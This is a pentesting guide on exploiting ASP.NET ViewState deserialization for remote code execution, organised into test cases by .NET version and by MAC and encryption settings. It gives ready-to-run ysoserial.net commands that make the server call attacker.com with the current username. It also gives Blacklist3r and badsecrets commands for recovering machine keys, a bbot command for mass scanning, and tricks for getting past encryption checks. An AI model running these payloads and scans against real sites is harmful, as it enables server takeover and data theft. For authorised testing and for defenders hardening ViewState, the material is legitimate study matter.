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# Exploiting \_\_VIEWSTATE without knowing the secrets
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## What is ViewState
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**ViewState** serves as the default mechanism in ASP.NET to maintain page and control data across web pages. During the rendering of a page's HTML, the current state of the page and values to be preserved during a postback are serialized into base64-encoded strings. These strings are then placed in hidden ViewState fields.
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ViewState information can be characterized by the following properties or their combinations:
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* **Base64**:
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* This format is utilized when both `EnableViewStateMac` and `ViewStateEncryptionMode` attributes are set to false.
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* **Base64 + MAC (Message Authentication Code) Enabled**:
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* Activation of MAC is achieved by setting the `EnableViewStateMac` attribute to true. This provides integrity verification for ViewState data.
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* **Base64 + Encrypted**:
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* Encryption is applied when the `ViewStateEncryptionMode` attribute is set to true, ensuring the confidentiality of ViewState data.
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## Test Cases
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The image is a table detailing different configurations for ViewState in ASP.NET based on the .NET framework version. Here's a summary of the content:
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1. For **any version of .NET**, when both MAC and Encryption are disabled, a MachineKey is not required, and thus there's no applicable method to identify it.
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2. For **versions below 4.5**, if MAC is enabled but Encryption is not, a MachineKey is required. The method to identify the MachineKey is referred to as "Blacklist3r."
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3. For **versions below 4.5**, regardless of whether MAC is enabled or disabled, if Encryption is enabled, a MachineKey is needed. Identifying the MachineKey is a task for "Blacklist3r - Future Development."
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4. For **versions 4.5 and above**, all combinations of MAC and Encryption (whether both are true, or one is true and the other is false) necessitate a MachineKey. The MachineKey can be identified using "Blacklist3r."
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### Test Case: 1 – EnableViewStateMac=false and viewStateEncryptionMode=false
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It is also possible to disable the ViewStateMAC completely by setting the `AspNetEnforceViewStateMac` registry key to zero in:
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```
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HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v{VersionHere}
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```
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**Identifying ViewState Attributes**
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You can try to identify if ViewState is MAC protected by capturing a request containing this parameter with BurpSuite. If Mac is not used to protect the parameter you can exploit it using [**YSoSerial.Net**](https://github.com/pwntester/ysoserial.net)
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```
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ysoserial.exe -o base64 -g TypeConfuseDelegate -f ObjectStateFormatter -c "powershell.exe Invoke-WebRequest -Uri http://attacker.com/$env:UserName"
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```
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### Test case 1.5 – Like Test case 1 but the ViewState cookie isn't sent by the server
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Developers can **remove ViewState** from becoming part of an HTTP Request (the user won't receive this cookie).\
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One may assume that if **ViewState** is **not present**, their implementation is **secure** from any potential vulnerabilities arising with ViewState deserialization.\
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However, that is not the case. If we **add ViewState parameter** to the request body and send our serialized payload created using ysoserial, we will still be able to achieve **code execution** as shown in **Case 1**.
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### Test Case: 2 – .Net < 4.5 and EnableViewStateMac=true & ViewStateEncryptionMode=false
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In order to **enable ViewState MAC** for a **specific page** we need to make following changes on a specific aspx file:
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```bash
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<%@ Page Language="C#" AutoEventWireup="true" CodeFile="hello.aspx.cs" Inherits="hello" enableViewStateMac="True"%>
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```
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We can also do it for **overall** application by setting it on the **web.config** file as shown below:
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```xml
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<?xml version="1.0" encoding="UTF-8"?>
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<configuration>
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<system.web>
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<customErrors mode="Off" />
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<machineKey validation="SHA1" validationKey="C551753B0325187D1759B4FB055B44F7C5077B016C02AF674E8DE69351B69FEFD045A267308AA2DAB81B69919402D7886A6E986473EEEC9556A9003357F5ED45" />
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<pages enableViewStateMac="true" />
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</system.web>
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</configuration>
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```
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As the parameter is MAC protected this time to successfully execute the attack we first need the key used.
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You can try to use [**Blacklist3r(AspDotNetWrapper.exe)** ](https://github.com/NotSoSecure/Blacklist3r/tree/master/MachineKey/AspDotNetWrapper)to find the key used.
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```
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AspDotNetWrapper.exe --keypath MachineKeys.txt --encrypteddata /wEPDwUKLTkyMTY0MDUxMg9kFgICAw8WAh4HZW5jdHlwZQUTbXVsdGlwYXJ0L2Zvcm0tZGF0YWRkbdrqZ4p5EfFa9GPqKfSQRGANwLs= --decrypt --purpose=viewstate --modifier=6811C9FF --macdecode --TargetPagePath "/Savings-and-Investments/Application/ContactDetails.aspx" -f out.txt --IISDirPath="/"
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--encrypteddata : __VIEWSTATE parameter value of the target application
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--modifier : __VIWESTATEGENERATOR parameter value
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```
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[**Badsecrets**](https://github.com/blacklanternsecurity/badsecrets) is another tool which can identify known machineKeys. It is written in Python, so unlike Blacklist3r, there is no Windows dependency. For .NET viewstates, there is a "python blacklist3r" utility, which is the quickest way to use it.
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It can either be supplied with the viewstate and generator directly:
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```
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pip install badsecrets
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git clone https://github.com/blacklanternsecurity/badsecrets
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cd badsecrets
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python examples/blacklist3r.py --viewstate /wEPDwUJODExMDE5NzY5ZGQMKS6jehX5HkJgXxrPh09vumNTKQ== --generator EDD8C9AE
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```
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![https://user-images.githubusercontent.com/24899338/227034640-662b6aad-f8b9-49e4-9a6b-62a5f6ae2d60.png](https://user-images.githubusercontent.com/24899338/227034640-662b6aad-f8b9-49e4-9a6b-62a5f6ae2d60.png)
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Or, it can connect directly to the target URL and try to carve the viewstate out of the HTML:
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```
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pip install badsecrets
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git clone https://github.com/blacklanternsecurity/badsecrets
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cd badsecrets
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python examples/blacklist3r.py --url http://vulnerablesite/vulnerablepage.aspx
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```
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![https://user-images.githubusercontent.com/24899338/227034654-e8ad9648-6c0e-47cb-a873-bf97623a0089.png](https://user-images.githubusercontent.com/24899338/227034654-e8ad9648-6c0e-47cb-a873-bf97623a0089.png)
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To search for vulnerable viewstates at scale, in conjunction with subdomain enumeration, the `badsecrets` [**BBOT**](exploiting-\_\_viewstate-parameter.md) module can be used:
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```
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bbot -f subdomain-enum -m badsecrets -t evil.corp
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```
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![https://user-images.githubusercontent.com/24899338/227028780-950d067a-4a01-481f-8e11-41fabed1943a.png](https://user-images.githubusercontent.com/24899338/227028780-950d067a-4a01-481f-8e11-41fabed1943a.png)
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If you are lucky and the key is found,you can proceed with the attack using [**YSoSerial.Net**](https://github.com/pwntester/ysoserial.net)**:**
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```
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ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "powershell.exe Invoke-WebRequest -Uri http://attacker.com/$env:UserName" --generator=CA0B0334 --validationalg="SHA1" --validationkey="C551753B0325187D1759B4FB055B44F7C5077B016C02AF674E8DE69351B69FEFD045A267308AA2DAB81B69919402D7886A6E986473EEEC9556A9003357F5ED45"
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--generator = {__VIWESTATEGENERATOR parameter value}
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```
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In cases where `_VIEWSTATEGENERATOR` parameter **isn't sent** by the server you **don't** need to **provide** the `--generator` parameter **but these ones**:
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```bash
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--apppath="/" --path="/hello.aspx"
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```
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### Test Case: 3 – .Net < 4.5 and EnableViewStateMac=true/false and ViewStateEncryptionMode=true
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In this it's not known if the parameter is protected with MAC. Then, the value is probably encrypted and you will **need the Machine Key to encrypt your payload** to exploit the vulnerability.
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**In this case the** [**Blacklist3r**](https://github.com/NotSoSecure/Blacklist3r/tree/master/MachineKey/AspDotNetWrapper) **module is under development...**
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**Prior to .NET 4.5**, ASP.NET can **accept** an **unencrypted** \_`__VIEWSTATE`\_parameter from the users **even** if **`ViewStateEncryptionMode`** has been set to _**Always**_. ASP.NET **only checks** the **presence** of the **`__VIEWSTATEENCRYPTED`** parameter in the request. **If one removes this parameter, and sends the unencrypted payload, it will still be processed.**
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Therefore if the attackers find a way to get the Machinekey via another vuln like file traversal, [**YSoSerial.Net**](https://github.com/pwntester/ysoserial.net) command used in the **Case 2**, can be used to perform RCE using ViewState deserialization vulnerability.
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* Remove `__VIEWSTATEENCRYPTED` parameter from the request in order to exploit the ViewState deserialization vulnerability, else it will return a Viewstate MAC validation error and exploit will fail.
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### Test Case: 4 – .Net >= 4.5 and EnableViewStateMac=true/false and ViewStateEncryptionMode=true/false except both attribute to false
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We can force the usage of ASP.NET framework by specifying the below parameter inside the web.config file as shown below.
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```xml
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<httpRuntime targetFramework="4.5" />
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```
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Alternatively, this can be done by specifying the below option inside the `machineKey` paramter of web.config file.
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```bash
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compatibilityMode="Framework45"
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```
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As in the previous the **value is encrypted.** Then, to send a **valid payload the attacker need the key**.
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You can try to use [**Blacklist3r(AspDotNetWrapper.exe)** ](https://github.com/NotSoSecure/Blacklist3r/tree/master/MachineKey/AspDotNetWrapper)to find the key being used:
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```
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AspDotNetWrapper.exe --keypath MachineKeys.txt --encrypteddata bcZW2sn9CbYxU47LwhBs1fyLvTQu6BktfcwTicOfagaKXho90yGLlA0HrdGOH6x/SUsjRGY0CCpvgM2uR3ba1s6humGhHFyr/gz+EP0fbrlBEAFOrq5S8vMknE/ZQ/8NNyWLwg== --decrypt --purpose=viewstate --valalgo=sha1 --decalgo=aes --IISDirPath "/" --TargetPagePath "/Content/default.aspx"
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--encrypteddata = {__VIEWSTATE parameter value}
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--IISDirPath = {Directory path of website in IIS}
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--TargetPagePath = {Target page path in application}
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```
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For a more detailed description for IISDirPath and TargetPagePath [refer here](https://soroush.secproject.com/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/)
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Or, with [**Badsecrets**](https://github.com/blacklanternsecurity/badsecrets) (with a generator value):
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```bash
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cd badsecrets
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python examples/blacklist3r.py --viewstate JLFYOOegbdXmPjQou22oT2IxUwCAzSA9EAxD6+305e/4MQG7G1v5GI3wL7D94W2OGpVGrI2LCqEwDoS/8JkE0rR4ak0= --generator B2774415
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```
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![https://user-images.githubusercontent.com/24899338/227043316-13f0488f-5326-46cc-9604-404b908ebd7b.png](https://user-images.githubusercontent.com/24899338/227043316-13f0488f-5326-46cc-9604-404b908ebd7b.png)
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Once a valid Machine key is identified, **the next step is to generate a serialized payload using** [**YSoSerial.Net**](https://github.com/pwntester/ysoserial.net)
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```
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ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "powershell.exe Invoke-WebRequest -Uri http://attacker.com/$env:UserName" --path="/content/default.aspx" --apppath="/" --decryptionalg="AES" --decryptionkey="F6722806843145965513817CEBDECBB1F94808E4A6C0B2F2" --validationalg="SHA1" --validationkey="C551753B0325187D1759B4FB055B44F7C5077B016C02AF674E8DE69351B69FEFD045A267308AA2DAB81B69919402D7886A6E986473EEEC9556A9003357F5ED45"
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```
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If you have the value of `__VIEWSTATEGENERATOR` you can try to **use** the `--generator` parameter with that value and **omit** the parameters `--path` and `--apppath`
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![](https://notsosecure.com/sites/all/assets/group/nss\_uploads/2019/06/4.2.png)
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A successful exploitation of the ViewState deserialization vulnerability will lead to an out-of-band request to an attacker-controlled server, which includes the username. This kind of exploit is demonstrated in a proof of concept (PoC) which can be found through a resource titled "Exploiting ViewState Deserialization using Blacklist3r and YsoSerial.NET". For further details on how the exploitation process works and how to utilize tools like Blacklist3r for identifying the MachineKey, you can review the provided [PoC of Successful Exploitation](https://www.notsosecure.com/exploiting-viewstate-deserialization-using-blacklist3r-and-ysoserial-net/#PoC).
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### Test Case 6 – ViewStateUserKeys is being used
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The **ViewStateUserKey** property can be used to **defend** against a **CSRF attack**. If such a key has been defined in the application and we try to generate the **ViewState** payload with the methods discussed till now, the **payload won’t be processed by the application**.\
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You need to use one more parameter in order to create correctly the payload:
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```bash
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--viewstateuserkey="randomstringdefinedintheserver"
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```
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### Result of a Successful Exploitation <a href="#poc" id="poc"></a>
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For all the test cases, if the ViewState YSoSerial.Net payload works **successfully** then the server responds with “**500 Internal server error**” having response content “**The state information is invalid for this page and might be corrupted**” and we get the OOB reques.
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Check for [further information here](\[\*\*https:/www.notsosecure.com/exploiting-viewstate-deserialization-using-blacklist3r-and-ysoserial-net/\*\*]\(https:/www.notsosecure.com/exploiting-viewstate-deserialization-using-blacklist3r-and-ysoserial-net/\)/)
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## References
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* [**https://www.notsosecure.com/exploiting-viewstate-deserialization-using-blacklist3r-and-ysoserial-net/**](https://www.notsosecure.com/exploiting-viewstate-deserialization-using-blacklist3r-and-ysoserial-net/)
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* [**https://medium.com/@swapneildash/deep-dive-into-net-viewstate-deserialization-and-its-exploitation-54bf5b788817**](https://medium.com/@swapneildash/deep-dive-into-net-viewstate-deserialization-and-its-exploitation-54bf5b788817)\\
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* [**https://soroush.secproject.com/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/**](https://soroush.secproject.com/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/)
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* [**https://blog.blacklanternsecurity.com/p/introducing-badsecrets**](https://blog.blacklanternsecurity.com/p/introducing-badsecrets)
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